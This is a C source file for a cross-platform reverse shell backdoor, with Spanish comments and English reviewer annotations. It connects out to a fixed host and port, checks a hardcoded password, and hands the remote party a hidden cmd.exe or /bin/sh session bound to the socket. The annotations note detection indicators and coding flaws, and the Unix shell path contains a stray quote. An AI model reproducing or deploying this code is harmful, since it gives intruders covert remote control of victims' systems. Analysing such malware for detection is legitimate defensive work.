#include <stdio.h>
#include <string.h>
//cabecera y librerias segun SO
#ifdef WIN32
#include <winsock2.h>
#pragma comment(lib,"ws2_32.lib")
#else
#include <netdb.h>
#include <sys/socket.h>
#define SOCKET_ERROR -1
#endif
#define PASSWORD "mi_pass\0"
//contraseña
/* File-scope state shared by main(), ReverseShell() and Loggea(). None of it is
 * initialised explicitly, so all three objects start zeroed (static storage). */
char Buffer[1024]; //single 1024-byte buffer used for both send() and recv()
int Recv; //byte count returned by the most recent recv() in Loggea()
int sock; //the one socket descriptor used everywhere; stays 0 until ReverseShell() assigns it
int ReverseShell(char *Destino, short Puerto,char *pwd); //defined below; `pwd` is accepted but never read in its body
/*funcion principal*/
int main()
{
/* Reconnect loop with no exit path: the trailing `return 0` sits after an
 * infinite for(;;) and is never reached. Each pass:
 *   1. probes the global `sock` with a zero-length send(); a result <= 0 is
 *      treated as "connection gone" (on the very first pass `sock` is still 0,
 *      its static initial value, so the probe is not on a connected socket);
 *   2. on failure tears the socket down and calls ReverseShell() to reconnect to
 *      "localhost":4664 with the compile-time PASSWORD (return value ignored);
 *   3. sleeps: Sleep(100) is 100 ms on Windows, sleep(100) is 100 s elsewhere,
 *      so the cadence differs by a factor of 1000 between the two builds.
 * Detection note: the periodic zero-length send() keepalive and repeated
 * outbound connects to one fixed port are the observable behaviour of this
 * loop. */
for(;;)
{
if(send(sock,"",0,0)<=0)
{
#ifdef WIN32
WSACleanup(); //Windows build releases Winsock as a whole rather than closing one socket
#else
close(sock);
#endif
ReverseShell("localhost",4664,PASSWORD); //result not checked; the loop simply re-probes later
}
#ifdef WIN32
Sleep(100); //milliseconds
#else
sleep(100); //seconds
#endif
}
return 0; //unreachable: the loop above never breaks
}
int ReverseShell(char *Destino, short Puerto, char *pwd)
{
/* Connects the global `sock` to Destino:Puerto, gates on Loggea(), then attaches
 * a command interpreter to that socket. Returns 0 on any failure before the
 * interpreter is started and 1 afterwards; the caller (main) ignores the result.
 *
 * `pwd` is never used in this body: the only credential check is Loggea(),
 * which compares against the PASSWORD macro directly.
 *
 * Review notes (defender's view):
 *  - The sole authentication is a cleartext password sent over unencrypted TCP,
 *    compared with strcmp() and with no attempt limit (see Loggea()). Because
 *    PASSWORD is a string literal it is recoverable from the binary with `strings`.
 *  - gethostbyname() can return NULL (unknown host); the result is dereferenced
 *    at the sin_addr assignment without a check.
 *  - Indicators: an outbound TCP connect to a fixed port, the prompt
 *    "\n[#] Introduce la password:" on the wire, then a child process whose
 *    stdin/stdout/stderr are all the socket. */
int Loggea(); //local prototype for the password gate defined later in this file
struct hostent *Master;
struct sockaddr_in Winsock_In;
//on Windows the socket library has to be loaded first
#ifdef WIN32
STARTUPINFO start_proc;
PROCESS_INFORMATION info_proc;
OSVERSIONINFO SOinfo;
WSADATA wsaData;
char *shell;
//initialise Winsock so a socket can be created (return value is not checked)
WSAStartup(MAKEWORD(2,2),/*requested Winsock version*/ &wsaData /*receives the implementation details*/);
if((sock=WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,NULL,(unsigned int)NULL,(unsigned int)NULL))==INVALID_SOCKET)
return 0;
#else
if((sock=socket(AF_INET,SOCK_STREAM,0))==SOCKET_ERROR)
return 0;
#endif
Master=gethostbyname(Destino); //may be NULL on lookup failure; not checked before the use below
Winsock_In.sin_family=AF_INET;
//IPv4
Winsock_In.sin_port=htons(Puerto);
//port to connect to
Winsock_In.sin_addr= *((struct in_addr *)
Master->h_addr); //host to connect to (dereferences Master unconditionally)
#ifdef WIN32
if(WSAConnect(sock,(SOCKADDR*)&Winsock_In,sizeof(Winsock_In),NULL,NULL,NULL,NULL)==SOCKET_ERROR)
return 0;
#else
if(connect(sock,(struct sock_addr *)&Winsock_In,sizeof(struct sockaddr))==SOCKET_ERROR)
return 0;
#endif
//password gate; on failure the socket is left open and 0 is returned
if(Loggea()==0)
return 0;
#ifdef WIN32
//fill in the process start-up block
memset(&start_proc,0,sizeof(start_proc));//zero it first
start_proc.cb=sizeof(start_proc);
start_proc.dwFlags=STARTF_USESTDHANDLES;
start_proc.wShowWindow=SW_HIDE;
//all three standard handles of the child are the socket itself
start_proc.hStdInput=(HANDLE)sock;
start_proc.hStdOutput=(HANDLE)sock;
start_proc.hStdError=(HANDLE)sock;
GetVersionEx(&SOinfo);
//Win9x platform family gets command.com, everything else cmd.exe
if(SOinfo.dwPlatformId==VER_PLATFORM_WIN32_WINDOWS)
{
shell="command.com\0";
}
else
{
shell="cmd.exe\0";
}
//launch the interpreter with handle inheritance (TRUE) so it picks up the handles set above;
//a CreateProcess result of 0 yields return 1, any other result runs WSACleanup() and returns 0
if(CreateProcess(NULL,shell,NULL,NULL,TRUE,0,NULL,NULL,&start_proc,&info_proc)==0)
{
return 1;
}
else
{
WSACleanup();
return 0;
}
#else
//parent: drop its copy of the socket and report failure; only the child continues below
if(fork()!=0)
{
close(sock);
return 0;
}
//child: make stdin, stdout and stderr the socket
dup2(sock,0);
dup2(sock,1);
dup2(sock,2);
//replace the child image with a shell; the body below runs only if execl returns 0,
//otherwise the child falls through to `return 1` and resumes main()'s loop
if(!execl("/bin/sh'","sh",NULL))
{
close(sock);
return 0;
}
#endif
return 1;
}
//devuelve 0 (incorrecto) / 1 (correcto)
int Loggea()
{
/* Password gate on the global `sock`. Prompts, reads one reply into Buffer,
 * strips the last received byte, and repeats until the reply equals PASSWORD.
 * Returns 0 only when recv() reports a closed or failed connection, 1 once the
 * password matches.
 * Review notes:
 *  - PASSWORD is a string literal, so `PASSWORD!=NULL` is always true and the
 *    outer if never skips the loop.
 *  - No attempt counter or delay: the loop permits unlimited online guessing,
 *    each wrong reply simply re-prompts.
 *  - The memset clears only sizeof(char*) bytes (4 or 8), not the 1024-byte
 *    Buffer; termination then rests on the NUL written at Buffer[Recv-1].
 *  - Buffer[Recv-1]='\0' drops the last received byte unconditionally
 *    (evidently intended for a trailing newline). */
if(PASSWORD!=NULL)
{
do
{
//partially clear the buffer (pointer-sized bytes only, see note above)
memset(Buffer,0,sizeof(char*));
//prompt for the password; the length comes from a literal lacking the space after
//"[#]", so one byte fewer than the message is sent (the trailing space is cut)
send(sock,"\n[#] Introduce la password: ",strlen("\n[#]Introduce la password: "),0);
//read the reply (up to 1024 bytes; recv() adds no terminator)
Recv=recv(sock,Buffer,1024,0);
//0 = peer closed, <0 = error: give up
if(Recv<=0)
return 0;
Buffer[Recv-1]='\0'; //overwrite the last byte received (expected newline) with NUL
}
while(strcmp(Buffer,PASSWORD)!=0); //cleartext comparison, no retry limit
//the length literal has an extra ')', so 15 bytes go out: the 14-char message plus its NUL terminator
send(sock,"[#]Aceptada!\n\n",strlen("[#]Aceptada!\n\n)"),0);
}
return 1;
}